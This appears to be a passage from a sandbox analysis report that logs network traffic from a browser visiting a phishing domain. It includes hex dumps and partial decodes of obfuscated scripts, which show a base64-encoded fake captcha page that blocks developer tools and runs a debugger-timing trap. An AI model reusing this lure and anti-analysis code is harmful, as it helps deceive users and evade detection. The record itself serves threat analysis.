3b 47 3c 4d 3b 4f 3d 4f 3c 3c 31 7c 54 2c 45 2d 31 3d 3d 50
                                                    Data Ascii: lse{if(Object[aa(242)][aa(303)][aa(251)](I,J)){if(256>J[aa(232)](0)){for(G=0;G<M;O<<=1,P==E-1?(P=0,N[aa(237)](F(O)),O=0):P++,G++);for(T=J[aa(232)](0),G=0;8>G;O=T&1|O<<1,E-1==P?(P=0,N[aa(237)](F(O)),O=0):P++,T>>=1,G++);}else{for(T=1,G=0;G<M;O=O<<1|T,E-1==P
                                                    2024-11-25 18:44:30 UTC1369INData Raw: 36 38 2c 66 75 6e 63 74 69 6f 6e 28 45 2c 61 63 29 7b 72 65 74 75 72 6e 20 61 63 3d 61 62 2c 44 5b 61 63 28 32 33 32 29 5d 28 45 29 7d 29 7d 2c 27 69 27 3a 66 75 6e 63 74 69 6f 6e 28 44 2c 45 2c 46 2c 61 64 2c 47 2c 48 2c 49 2c 4a 2c 4b 2c 4c 2c 4d 2c 4e 2c 4f 2c 50 2c 51 2c 52 2c 54 2c 53 29 7b 66 6f 72 28 61 64 3d 61 38 2c 47 3d 5b 5d 2c 48 3d 34 2c 49 3d 34 2c 4a 3d 33 2c 4b 3d 5b 5d 2c 4e 3d 46 28 30 29 2c 4f 3d 45 2c 50 3d 31 2c 4c 3d 30 3b 33 3e 4c 3b 47 5b 4c 5d 3d 4c 2c 4c 2b 3d 31 29 3b 66 6f 72 28 51 3d 30 2c 52 3d 4d 61 74 68 5b 61 64 28 32 36 38 29 5d 28 32 2c 32 29 2c 4d 3d 31 3b 52 21 3d 4d 3b 53 3d 4e 26 4f 2c 4f 3e 3e 3d 31 2c 4f 3d 3d 30 26 26 28 4f 3d 45 2c 4e 3d 46 28 50 2b 2b 29 29 2c 51 7c 3d 28 30 3c 53 3f 31 3a 30 29 2a 4d 2c 4d 3c
                                                    Data Ascii: 68,function(E,ac){return ac=ab,D[ac(232)](E)})},'i':function(D,E,F,ad,G,H,I,J,K,L,M,N,O,P,Q,R,T,S){for(ad=a8,G=[],H=4,I=4,J=3,K=[],N=F(0),O=E,P=1,L=0;3>L;G[L]=L,L+=1);for(Q=0,R=Math[ad(268)](2,2),M=1;R!=M;S=N&O,O>>=1,O==0&&(O=E,N=F(P++)),Q|=(0<S?1:0)*M,M<
                                                    2024-11-25 18:44:30 UTC1369INData Raw: 28 32 37 32 29 5d 28 67 29 2c 44 3d 67 5b 61 33 28 32 37 37 29 5d 2c 45 3d 7b 7d 2c 45 3d 4f 62 64 45 6b 35 28 44 2c 44 2c 27 27 2c 45 29 2c 45 3d 4f 62 64 45 6b 35 28 44 2c 44 5b 61 33 28 32 37 39 29 5d 7c 7c 44 5b 61 33 28 33 30 38 29 5d 2c 27 6e 2e 27 2c 45 29 2c 45 3d 4f 62 64 45 6b 35 28 44 2c 67 5b 61 33 28 33 30 31 29 5d 2c 27 64 2e 27 2c 45 29 2c 69 5b 61 33 28 32 33 33 29 5d 5b 61 33 28 32 34 34 29 5d 28 67 29 2c 46 3d 7b 7d 2c 46 2e 72 3d 45 2c 46 2e 65 3d 6e 75 6c 6c 2c 46 7d 63 61 74 63 68 28 48 29 7b 72 65 74 75 72 6e 20 47 3d 7b 7d 2c 47 2e 72 3d 7b 7d 2c 47 2e 65 3d 48 2c 47 7d 7d 66 75 6e 63 74 69 6f 6e 20 78 28 64 2c 61 34 29 7b 72 65 74 75 72 6e 20 61 34 3d 56 2c 4d 61 74 68 5b 61 34 28 33 30 35 29 5d 28 29 3c 64 7d 66 75 6e 63 74 69 6f
                                                    Data Ascii: (272)](g),D=g[a3(277)],E={},E=ObdEk5(D,D,'',E),E=ObdEk5(D,D[a3(279)]||D[a3(308)],'n.',E),E=ObdEk5(D,g[a3(301)],'d.',E),i[a3(233)][a3(244)](g),F={},F.r=E,F.e=null,F}catch(H){return G={},G.r={},G.e=H,G}}function x(d,a4){return a4=V,Math[a4(305)]()<d}functio
                                                    2024-11-25 18:44:30 UTC1369INData Raw: 30 30 2c 4a 5b 61 37 28 32 39 33 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 2c 4a 5b 61 37 28 33 32 37 29 5d 28 61 37 28 32 34 33 29 2c 61 37 28 32 39 34 29 29 2c 4e 3d 7b 7d 2c 4e 5b 61 37 28 32 37 34 29 5d 3d 47 2c 4e 5b 61 37 28 32 38 39 29 5d 3d 4d 2c 4e 5b 61 37 28 32 35 37 29 5d 3d 61 37 28 32 37 35 29 2c 4f 3d 42 5b 61 37 28 32 32 33 29 5d 28 4a 53 4f 4e 5b 61 37 28 33 32 30 29 5d 28 4e 29 29 5b 61 37 28 32 38 31 29 5d 28 27 2b 27 2c 61 37 28 32 32 32 29 29 2c 4a 5b 61 37 28 33 30 37 29 5d 28 27 76 5f 27 2b 48 2e 72 2b 27 3d 27 2b 4f 29 7d 63 61 74 63 68 28 50 29 7b 7d 7d 66 75 6e 63 74 69 6f 6e 20 61 28 61 68 29 7b 72 65 74 75 72 6e 20 61 68 3d 27 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 73 6f 6e 2c 70 72 6f 74 6f 74 79 70 65 2c 43 6f 6e 74 65 6e
                                                    Data Ascii: 00,J[a7(293)]=function(){},J[a7(327)](a7(243),a7(294)),N={},N[a7(274)]=G,N[a7(289)]=M,N[a7(257)]=a7(275),O=B[a7(223)](JSON[a7(320)](N))[a7(281)]('+',a7(222)),J[a7(307)]('v_'+H.r+'='+O)}catch(P){}}function a(ah){return ah='application/json,prototype,Conten
                                                    2024-11-25 18:44:30 UTC762INData Raw: 74 69 6f 6e 2c 6f 6e 72 65 61 64 79 73 74 61 74 65 63 68 61 6e 67 65 2c 25 32 62 2c 63 6e 4a 48 67 59 48 7a 55 69 6d 2c 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 2c 73 6f 72 74 2c 63 68 61 72 41 74 2c 5f 63 66 5f 63 68 6c 5f 6f 70 74 3b 61 4a 58 51 30 3b 50 75 55 73 35 3b 76 77 6e 4b 66 30 3b 5a 6f 41 59 4e 35 3b 53 72 73 6a 34 3b 79 64 57 73 36 3b 54 58 6b 62 30 3b 56 51 54 4c 75 32 3b 69 51 6d 66 77 31 3b 46 68 48 79 32 3b 57 46 6c 66 4e 34 3b 52 4c 47 43 35 3b 42 4a 79 6f 30 3b 4f 62 64 45 6b 35 3b 50 65 71 47 31 3b 66 58 6f 52 65 38 3b 55 4a 4f 42 35 2c 69 66 72 61 6d 65 2c 63 46 50 57 76 2c 66 72 6f 6d 43 68 61 72 43 6f 64 65 2c 6d 61 70 2c 63 68 61 72 43 6f 64 65 41 74 2c 62 6f 64 79 2c 73 70 6c 69 74 2c 32 33 38 31 32 32 34 4a 78 78 54 6e 44
                                                    Data Ascii: tion,onreadystatechange,%2b,cnJHgYHzUim,DOMContentLoaded,sort,charAt,_cf_chl_opt;aJXQ0;PuUs5;vwnKf0;ZoAYN5;Srsj4;ydWs6;TXkb0;VQTLu2;iQmfw1;FhHy2;WFlfN4;RLGC5;BJyo0;ObdEk5;PeqG1;fXoRe8;UJOB5,iframe,cFPWv,fromCharCode,map,charCodeAt,body,split,2381224JxxTnD


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    38192.168.2.449792104.21.63.274432200C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-11-25 18:44:30 UTC688OUTGET /aXqrQHt/ HTTP/1.1
                                                    Host: nl.nsiciumbe.com
                                                    Connection: keep-alive
                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                    sec-ch-ua-mobile: ?0
                                                    sec-ch-ua-platform: "Windows"
                                                    Upgrade-Insecure-Requests: 1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Sec-Fetch-Site: cross-site
                                                    Sec-Fetch-Mode: navigate
                                                    Sec-Fetch-Dest: document
                                                    Referer: https://yancesybros.com/
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US,en;q=0.9
                                                    2024-11-25 18:44:31 UTC1233INHTTP/1.1 200 OK
                                                    Date: Mon, 25 Nov 2024 18:44:31 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Cache-Control: no-cache, private
                                                    cf-cache-status: DYNAMIC
                                                    vary: accept-encoding
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qyGG4A%2FE4PYFjIwL7An1953j7%2FfN1lqpMKVfezewrmXHWlPEadB9O5V41CAhhJMdL6Z6U4BpseZrFG%2BaAFCWPT61qyTfYAPKnWehoJAQfhHVJht6p%2BdPq4%2F9z11tsg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    alt-svc: h3=":443"; ma=86400
                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1491&sent=944&recv=607&lost=0&retrans=8&sent_bytes=980567&recv_bytes=48457&delivery_rate=14950131&cwnd=321&unsent_bytes=0&cid=dfdba2c0a8efaf8d&ts=2896202&x=0"
                                                    Set-Cookie: XSRF-TOKEN=eyJpdiI6IndoT3E0amV6TWI2QjYwVmZyQm44d3c9PSIsInZhbHVlIjoidTE4bGl2ellacHF0aVl5clFaUDc0NVhpdFlWQ1dlNG9XNDZzMzZwWm5IY0g2M2dLM1FOKzljRXhiMCtyYmR6eG50UEE3cU5Id3JJNFdTdXV6OXlBVUpjVGd0SjZkSVJCR3pJL2ZFazVDRjhHTkJoQjc3bTMvdFdrVXVxYkZiMEYiLCJtYWMiOiJmZTMwOTBjZjgzZWE5NzEyY2NiMjFlODg0MDRiMmQwY2Y1MDM0Y2NmZWI2MGMxMzVjNzU0Y2ExY2JjNzgxOTAzIiwidGFnIjoiIn0%3D; expires=Mon, 25-Nov-2024 20:44:31 GMT; Max-Age=7200; path=/; secure; samesite=none
                                                    2024-11-25 18:44:31 UTC707INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 6c 61 72 61 76 65 6c 5f 73 65 73 73 69 6f 6e 3d 65 79 4a 70 64 69 49 36 49 6d 78 73 56 45 52 57 5a 56 52 70 57 57 35 44 62 6e 64 6e 64 6b 4a 68 64 6e 52 79 4f 58 63 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 51 33 41 79 61 6a 52 69 56 6c 4a 42 61 30 64 73 52 48 4e 4c 61 6c 6c 4b 56 46 5a 6e 63 6a 45 35 5a 6e 5a 61 5a 47 6c 71 56 57 38 31 64 47 63 79 59 30 4d 7a 55 30 51 72 61 48 70 7a 4d 43 39 6a 57 48 5a 54 4b 33 4a 5a 59 57 73 31 65 6e 4a 45 5a 31 4a 6f 56 54 46 59 59 57 31 4a 52 31 4a 51 5a 55 38 35 4f 48 4e 32 4e 6d 68 54 52 30 4e 56 53 45 4e 56 4e 30 55 78 55 46 4e 61 4d 32 4a 54 57 6b 6c 61 59 6d 4e 34 55 33 70 72 4d 48 52 58 62 47 64 6c 65 48 68 6f 51 30 68 44 52 46 56 77 4d 58 4a 74 59 57 49 32 53 30 59
                                                    Data Ascii: Set-Cookie: laravel_session=eyJpdiI6ImxsVERWZVRpWW5DbndndkJhdnRyOXc9PSIsInZhbHVlIjoiQ3AyajRiVlJBa0dsRHNLallKVFZncjE5ZnZaZGlqVW81dGcyY0MzU0QraHpzMC9jWHZTK3JZYWs1enJEZ1JoVTFYYW1JR1JQZU85OHN2NmhTR0NVSENVN0UxUFNaM2JTWklaYmN4U3prMHRXbGdleHhoQ0hDRFVwMXJtYWI2S0Y
                                                    2024-11-25 18:44:31 UTC1369INData Raw: 34 39 38 64 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 0d 0a 69 66 28 61 74 6f 62 28 22 61 48 52 30 63 48 4d 36 4c 79 39 6b 4e 6a 59 75 62 6e 4e 70 59 32 6c 31 62 57 4a 6c 4c 6d 4e 76 62 53 39 68 57 48 46 79 55 55 68 30 4c 77 3d 3d 22 29 20 3d 3d 20 22 6e 6f 6d 61 74 63 68 22 29 7b 0d 0a 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 64 65 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 65 73 63 61 70 65 28 61 74 6f 62 28 27 50 43 46 45 54 30 4e 55 57 56 42 46 49 47 68 30 62 57 77 2b 44 51 6f 38 61 48 52 74 62 43 42 73 59 57 35 6e 50 53 4a 6c 62 69 49 2b 44 51 6f 38 61 47 56 68 5a 44 34 4e 43 69 41 67 49 43 41 38 63 32 4e 79 61 58 42 30 49 48 4e 79 59 7a 30 69 61 48 52 30 63 48 4d 36 4c 79 39 6a 62 32 52 6c 4c 6d 70 78 64 57 56 79 65 53 35 6a 62 32 30 76 61 6e
                                                    Data Ascii: 498d<script>if(atob("aHR0cHM6Ly9kNjYubnNpY2l1bWJlLmNvbS9hWHFyUUh0Lw==") == "nomatch"){document.write(decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+DQo8aHRtbCBsYW5nPSJlbiI+DQo8aGVhZD4NCiAgICA8c2NyaXB0IHNyYz0iaHR0cHM6Ly9jb2RlLmpxdWVyeS5jb20van
                                                    2024-11-25 18:44:31 UTC1369INData Raw: 63 7a 4d 7a 4f 54 59 76 64 58 4e 6c 63 6d 6c 75 64 47 56 79 4c 6e 42 75 5a 79 49 70 4f 77 30 4b 49 43 41 67 49 47 4a 68 59 32 74 6e 63 6d 39 31 62 6d 51 74 63 32 6c 36 5a 54 6f 67 59 32 39 32 5a 58 49 37 44 51 6f 67 49 43 41 67 59 6d 46 6a 61 32 64 79 62 33 56 75 5a 43 31 77 62 33 4e 70 64 47 6c 76 62 6a 6f 67 59 32 56 75 64 47 56 79 4f 77 30 4b 49 43 41 67 49 47 5a 70 62 48 52 6c 63 6a 6f 67 59 6d 78 31 63 69 67 78 4e 48 42 34 4b 54 73 4e 43 69 41 67 49 43 42 36 4c 57 6c 75 5a 47 56 34 4f 69 41 74 4d 54 73 4e 43 6e 30 4e 43 69 35 6a 62 32 35 30 5a 57 35 30 49 48 73 4e 43 69 41 67 49 43 42 77 62 33 4e 70 64 47 6c 76 62 6a 6f 67 63 6d 56 73 59 58 52 70 64 6d 55 37 44 51 6f 67 49 43 41 67 65 69 31 70 62 6d 52 6c 65 44 6f 67 4d 54 73 4e 43 69 41 67 49 43 42
                                                    Data Ascii: czMzOTYvdXNlcmludGVyLnBuZyIpOw0KICAgIGJhY2tncm91bmQtc2l6ZTogY292ZXI7DQogICAgYmFja2dyb3VuZC1wb3NpdGlvbjogY2VudGVyOw0KICAgIGZpbHRlcjogYmx1cigxNHB4KTsNCiAgICB6LWluZGV4OiAtMTsNCn0NCi5jb250ZW50IHsNCiAgICBwb3NpdGlvbjogcmVsYXRpdmU7DQogICAgei1pbmRleDogMTsNCiAgICB
                                                    2024-11-25 18:44:31 UTC1369INData Raw: 44 4e 6b 4d 32 51 7a 4f 77 30 4b 49 43 41 67 49 47 4a 76 63 6d 52 6c 63 69 31 79 59 57 52 70 64 58 4d 36 49 44 4e 77 65 44 73 4e 43 69 41 67 49 43 42 69 59 57 4e 72 5a 33 4a 76 64 57 35 6b 4c 57 4e 76 62 47 39 79 4f 69 41 6a 5a 6d 5a 6d 4f 77 30 4b 49 43 41 67 49 47 31 68 63 6d 64 70 62 69 31 79 61 57 64 6f 64 44 6f 67 4d 54 42 77 65 44 73 4e 43 69 41 67 49 43 42 77 62 33 4e 70 64 47 6c 76 62 6a 6f 67 63 6d 56 73 59 58 52 70 64 6d 55 37 44 51 70 39 44 51 6f 4e 43 69 35 6a 59 58 42 30 59 32 68 68 4c 57 4e 6f 5a 57 4e 72 59 6d 39 34 49 47 6c 75 63 48 56 30 57 33 52 35 63 47 55 39 49 6d 4e 6f 5a 57 4e 72 59 6d 39 34 49 6c 30 36 59 32 68 6c 59 32 74 6c 5a 43 41 72 49 47 78 68 59 6d 56 73 49 43 35 6a 59 58 42 30 59 32 68 68 4c 57 4e 6f 5a 57 4e 72 62 57 46 79
                                                    Data Ascii: DNkM2QzOw0KICAgIGJvcmRlci1yYWRpdXM6IDNweDsNCiAgICBiYWNrZ3JvdW5kLWNvbG9yOiAjZmZmOw0KICAgIG1hcmdpbi1yaWdodDogMTBweDsNCiAgICBwb3NpdGlvbjogcmVsYXRpdmU7DQp9DQoNCi5jYXB0Y2hhLWNoZWNrYm94IGlucHV0W3R5cGU9ImNoZWNrYm94Il06Y2hlY2tlZCArIGxhYmVsIC5jYXB0Y2hhLWNoZWNrbWFy
                                                    2024-11-25 18:44:31 UTC1369INData Raw: 6f 67 49 43 41 67 5a 6d 78 6c 65 43 31 6b 61 58 4a 6c 59 33 52 70 62 32 34 36 49 47 4e 76 62 48 56 74 62 6a 73 4e 43 69 41 67 49 43 42 68 62 47 6c 6e 62 69 31 70 64 47 56 74 63 7a 6f 67 59 32 56 75 64 47 56 79 4f 77 30 4b 49 43 41 67 49 48 64 70 5a 48 52 6f 4f 69 41 78 4d 44 41 6c 4f 77 30 4b 49 43 41 67 49 47 31 68 63 6d 64 70 62 69 31 30 62 33 41 36 49 44 45 77 63 48 67 37 44 51 70 39 44 51 6f 4e 43 69 35 6a 59 58 42 30 59 32 68 68 4c 57 4e 76 62 6e 52 6c 62 6e 51 67 61 57 31 6e 49 48 73 4e 43 69 41 67 49 43 42 33 61 57 52 30 61 44 6f 67 4d 54 41 77 4a 54 73 4e 43 69 41 67 49 43 42 74 59 58 4a 6e 61 57 34 74 59 6d 39 30 64 47 39 74 4f 69 41 78 4d 48 42 34 4f 77 30 4b 66 51 30 4b 44 51 6f 75 59 32 46 77 64 47 4e 6f 59 53 31 6a 62 32 35 30 5a 57 35 30 49
                                                    Data Ascii: ogICAgZmxleC1kaXJlY3Rpb246IGNvbHVtbjsNCiAgICBhbGlnbi1pdGVtczogY2VudGVyOw0KICAgIHdpZHRoOiAxMDAlOw0KICAgIG1hcmdpbi10b3A6IDEwcHg7DQp9DQoNCi5jYXB0Y2hhLWNvbnRlbnQgaW1nIHsNCiAgICB3aWR0aDogMTAwJTsNCiAgICBtYXJnaW4tYm90dG9tOiAxMHB4Ow0KfQ0KDQouY2FwdGNoYS1jb250ZW50I
                                                    2024-11-25 18:44:31 UTC1369INData Raw: 6a 59 58 52 70 62 32 34 67 50 53 41 69 59 57 4a 76 64 58 51 36 59 6d 78 68 62 6d 73 69 4f 77 30 4b 66 51 30 4b 5a 47 39 6a 64 57 31 6c 62 6e 51 75 59 57 52 6b 52 58 5a 6c 62 6e 52 4d 61 58 4e 30 5a 57 35 6c 63 69 67 6e 61 32 56 35 5a 47 39 33 62 69 63 73 49 47 5a 31 62 6d 4e 30 61 57 39 75 4b 47 56 32 5a 57 35 30 4b 53 42 37 44 51 6f 67 49 43 41 67 61 57 59 67 4b 47 56 32 5a 57 35 30 4c 6d 74 6c 65 55 4e 76 5a 47 55 67 50 54 30 39 49 44 45 79 4d 79 6b 67 65 77 30 4b 49 43 41 67 49 43 41 67 49 43 42 6c 64 6d 56 75 64 43 35 77 63 6d 56 32 5a 57 35 30 52 47 56 6d 59 58 56 73 64 43 67 70 4f 77 30 4b 49 43 41 67 49 43 41 67 49 43 42 79 5a 58 52 31 63 6d 34 67 5a 6d 46 73 63 32 55 37 44 51 6f 67 49 43 41 67 66 51 30 4b 44 51 6f 67 49 43 41 67 61 57 59 67 4b 41
                                                    Data Ascii: jYXRpb24gPSAiYWJvdXQ6YmxhbmsiOw0KfQ0KZG9jdW1lbnQuYWRkRXZlbnRMaXN0ZW5lcigna2V5ZG93bicsIGZ1bmN0aW9uKGV2ZW50KSB7DQogICAgaWYgKGV2ZW50LmtleUNvZGUgPT09IDEyMykgew0KICAgICAgICBldmVudC5wcmV2ZW50RGVmYXVsdCgpOw0KICAgICAgICByZXR1cm4gZmFsc2U7DQogICAgfQ0KDQogICAgaWYgKA
                                                    2024-11-25 18:44:31 UTC1369INData Raw: 49 44 30 67 4d 54 41 77 4f 77 30 4b 49 43 41 67 49 48 4e 6c 64 45 6c 75 64 47 56 79 64 6d 46 73 4b 47 5a 31 62 6d 4e 30 61 57 39 75 4b 43 6b 67 65 77 30 4b 49 43 41 67 49 43 41 67 49 43 42 6a 62 32 35 7a 64 43 42 79 55 55 46 59 65 6b 5a 53 53 33 64 34 49 44 30 67 63 47 56 79 5a 6d 39 79 62 57 46 75 59 32 55 75 62 6d 39 33 4b 43 6b 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 47 52 6c 59 6e 56 6e 5a 32 56 79 4f 77 30 4b 49 43 41 67 49 43 41 67 49 43 42 6a 62 32 35 7a 64 43 42 57 55 6d 6c 51 53 6b 70 6a 59 58 42 76 49 44 30 67 63 47 56 79 5a 6d 39 79 62 57 46 75 59 32 55 75 62 6d 39 33 4b 43 6b 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 47 6c 6d 49 43 68 57 55 6d 6c 51 53 6b 70 6a 59 58 42 76 49 43 30 67 63 6c 46 42 57 48 70 47 55 6b 74 33 65 43 41 2b 49 48 70
                                                    Data Ascii: ID0gMTAwOw0KICAgIHNldEludGVydmFsKGZ1bmN0aW9uKCkgew0KICAgICAgICBjb25zdCByUUFYekZSS3d4ID0gcGVyZm9ybWFuY2Uubm93KCk7DQogICAgICAgIGRlYnVnZ2VyOw0KICAgICAgICBjb25zdCBWUmlQSkpjYXBvID0gcGVyZm9ybWFuY2Uubm93KCk7DQogICAgICAgIGlmIChWUmlQSkpjYXBvIC0gclFBWHpGUkt3eCA+IHp
                                                    2024-11-25 18:44:31 UTC1369INData Raw: 6c 56 6b 64 31 52 50 62 45 4a 4e 4b 33 52 43 54 53 74 34 51 6b 35 74 65 55 39 6b 64 6a 6c 77 54 57 70 44 62 6c 64 46 53 30 59 34 4d 45 39 48 4f 55 51 72 51 53 38 76 51 6b 46 4f 64 58 52 44 54 6b 39 77 51 30 35 50 56 6b 52 4e 61 6b 39 76 56 57 70 48 63 6c 5a 45 54 32 35 56 64 57 68 42 54 6b 52 50 62 6c 56 71 54 32 31 56 64 57 68 45 54 6d 5a 70 4e 30 4a 55 53 32 35 56 61 6b 39 75 56 57 70 50 62 6c 56 31 63 45 4e 4f 5a 58 42 4e 54 57 56 30 51 6b 35 6c 63 45 4e 4f 52 58 55 77 57 45 39 30 52 45 35 50 64 45 4e 4f 52 46 4e 76 56 57 70 54 62 31 56 71 55 32 39 56 4b 32 78 43 54 6b 39 30 51 30 35 50 64 45 4e 4f 54 33 42 44 54 6b 56 48 52 54 68 31 61 45 52 4e 65 6b 39 76 56 58 70 50 62 31 56 36 52 32 78 56 5a 58 52 44 54 6d 55 78 52 45 31 36 54 32 39 56 4b 33 68 45
                                                    Data Ascii: lVkd1RPbEJNK3RCTSt4Qk5teU9kdjlwTWpDbldFS0Y4ME9HOUQrQS8vQkFOdXRDTk9wQ05PVkRNak9vVWpHclZET25VdWhBTkRPblVqT21VdWhETmZpN0JUS25Vak9uVWpPblV1cENOZXBNTWV0Qk5lcENORXUwWE90RE5PdENORFNvVWpTb1VqU29VK2xCTk90Q05PdENOT3BDTkVHRTh1aERNek9vVXpPb1V6R2xVZXRDTmUxRE16T29VK3hE
                                                    2024-11-25 18:44:31 UTC1369INData Raw: 6c 75 59 56 56 42 51 55 46 45 52 32 52 47 53 6b 39 56 64 30 52 33 4b 30 45 77 51 6b 46 6e 57 6c 6c 54 51 57 64 52 4d 47 30 30 53 32 64 42 65 57 6f 76 59 6a 4d 77 4c 33 59 33 55 33 6c 50 4e 6c 64 43 4c 31 52 4b 51 58 70 78 55 55 70 61 56 58 59 30 4d 7a 6c 52 63 31 42 75 4e 31 6c 55 64 6a 68 59 61 44 5a 32 55 6b 30 33 5a 6a 4a 79 4e 47 59 32 56 57 39 58 63 53 74 56 63 56 5a 69 5a 6a 5a 75 61 30 5a 76 51 6b 78 55 53 6e 59 72 62 57 52 6f 4c 7a 5a 4d 55 56 5a 42 4d 48 4a 43 52 47 63 34 4d 31 4d 78 55 30 4e 4a 62 45 6c 6b 63 31 51 76 64 6d 5a 6f 4d 45 78 61 4d 7a 52 75 62 57 70 6f 53 32 68 31 61 55 52 53 57 43 39 54 63 31 46 6f 5a 47 4a 44 64 56 4e 71 57 58 68 4f 62 56 67 31 53 31 70 68 5a 6d 46 6d 62 6d 4d 79 62 6d 31 79 5a 47 4a 7a 57 6c 4e 7a 4d 7a 68 74 54
                                                    Data Ascii: luYVVBQUFER2RGSk9Vd0R3K0EwQkFnWllTQWdRMG00S2dBeWovYjMwL3Y3U3lPNldCL1RKQXpxUUpaVXY0MzlRc1BuN1lUdjhYaDZ2Uk03ZjJyNGY2VW9XcStVcVZiZjZua0ZvQkxUSnYrbWRoLzZMUVZBMHJCRGc4M1MxU0NJbElkc1QvdmZoMExaMzRubWpoS2h1aURSWC9Tc1FoZGJDdVNqWXhObVg1S1phZmFmbmMybm1yZGJzWlNzMzhtT
                                                    2024-11-25 18:44:31 UTC1369INData Raw: 6a 57 45 31 76 59 56 64 4b 54 55 78 68 59 6e 4e 57 61 30 70 33 65 48 52 6a 55 6c 4d 77 4c 30 78 53 57 45 70 33 4d 6e 52 54 5a 57 35 59 55 6d 52 73 55 6c 4e 53 61 57 45 30 65 44 6c 6b 4d 45 31 30 4e 55 78 48 53 30 46 30 57 47 55 34 55 6e 45 7a 65 53 74 35 59 32 67 76 51 32 74 36 64 57 70 53 57 6b 4a 4c 54 6b 38 79 54 6a 56 6a 65 44 51 35 63 46 56 68 54 45 78 73 4e 6b 49 32 53 7a 6c 51 4d 6c 67 35 51 7a 46 43 5a 6e 70 33 4c 30 4e 4c 4b 33 4e 4e 4d 57 4a 4d 54 45 70 5a 64 30 35 58 63 58 67 35 64 54 56 4e 52 48 4d 34 51 33 4e 48 4d 58 4d 33 5a 58 64 69 59 69 39 7a 63 31 46 36 4d 44 64 7a 56 45 56 76 51 7a 4a 57 64 43 74 4f 62 69 39 7a 63 47 78 6d 54 6c 4e 48 5a 47 52 72 4f 48 5a 31 59 54 63 31 5a 58 67 79 54 79 38 30 56 33 4a 51 61 47 64 6b 5a 47 4e 44 4d 32
                                                    Data Ascii: jWE1vYVdKTUxhYnNWa0p3eHRjUlMwL0xSWEp3MnRTZW5YUmRsUlNSaWE0eDlkME10NUxHS0F0WGU4UnEzeSt5Y2gvQ2t6dWpSWkJLTk8yTjVjeDQ5cFVhTExsNkI2SzlQMlg5QzFCZnp3L0NLK3NNMWJMTEpZd05XcXg5dTVNRHM4Q3NHMXM3ZXdiYi9zc1F6MDdzVEVvQzJWdCtObi9zcGxmTlNHZGRrOHZ1YTc1ZXgyTy80V3JQaGdkZGNDM2


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    39192.168.2.449794151.101.194.1374432200C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-11-25 18:44:33 UTC622OUTGET /jquery-3.6.0.min.js HTTP/1.1
                                                    Host: code.jquery.com
                                                    Connection: keep-alive
                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                    sec-ch-ua-mobile: ?0
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                    Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                    sec-ch-ua-platform: "Windows"
                                                    Accept: */*
                                                    Sec-Fetch-Site: cross-site
                                                    Sec-Fetch-Mode: no-cors
                                                    Sec-Fetch-Dest: script
                                                    Referer: https://nl.nsiciumbe.com/
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US,en;q=0.9
                                                    2024-11-25 18:44:33 UTC611INHTTP/1.1 200 OK
                                                    Connection: close
                                                    Content-Length: 89501
                                                    Server: nginx
                                                    Content-Type: application/javascript; charset=utf-8
                                                    Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                                    ETag: "28feccc0-15d9d"
                                                    Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                                    Access-Control-Allow-Origin: *
                                                    Cross-Origin-Resource-Policy: cross-origin
                                                    Via: 1.1 varnish, 1.1 varnish
                                                    Accept-Ranges: bytes
                                                    Age: 2542349
                                                    Date: Mon, 25 Nov 2024 18:44:33 GMT
                                                    X-Served-By: cache-lga21931-LGA, cache-nyc-kteb1890097-NYC
                                                    X-Cache: HIT, HIT
                                                    X-Cache-Hits: 55, 0
                                                    X-Timer: S1732560274.779441,VS0,VE1
                                                    Vary: Accept-Encoding
